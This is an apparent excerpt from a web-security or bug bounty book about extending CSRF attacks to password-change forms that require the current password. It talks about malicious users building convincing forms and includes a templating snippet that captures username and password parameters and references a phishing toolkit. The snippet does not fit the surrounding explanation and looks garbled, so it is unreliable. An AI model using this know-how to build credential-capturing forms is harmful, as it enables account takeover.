Avoiding problems with authentication

Practically all CSRF attacks depend on the user's session, which needs to be established previously in order to perform the actions using the privileged access defined in the user's profile. However, as we reviewed in the unsafe protections, some developers include confirmations to perform some actions.

One of the most common features that needs this kind of confirmation is the change password functionality. Maybe by exploiting a CSRF, a user can upload a new password, but the application could ask for the current password in order to accept the change. Basically, this confirmation is a new authentication.

In these cases, you need to add to the form being used to exploit the vulnerability and the feature to ask for a new password. You can use the following code to add this functionality:

{# CSRF #} 
{% set csrf = false %} 
{% set target_url = 'https://github.com/securestate/king-phisher' %} 
 
 
{% do 
  request.parameters.update({ 
  'username': request.parameters['username'], 
  'password': request.parameters['password'] 
  }) 
%}

From the bug bounty hunter's point of view, this is not a problem, because you just need to confirm that it is possible. The problem is for malicious users, who need to create forms that appears real to the victims, in order to avoid detection.

Table of Contents for Avoiding problems with authentication

Create new playlist

Sign In

Sign Up

Table of Contents for
Avoiding problems with authentication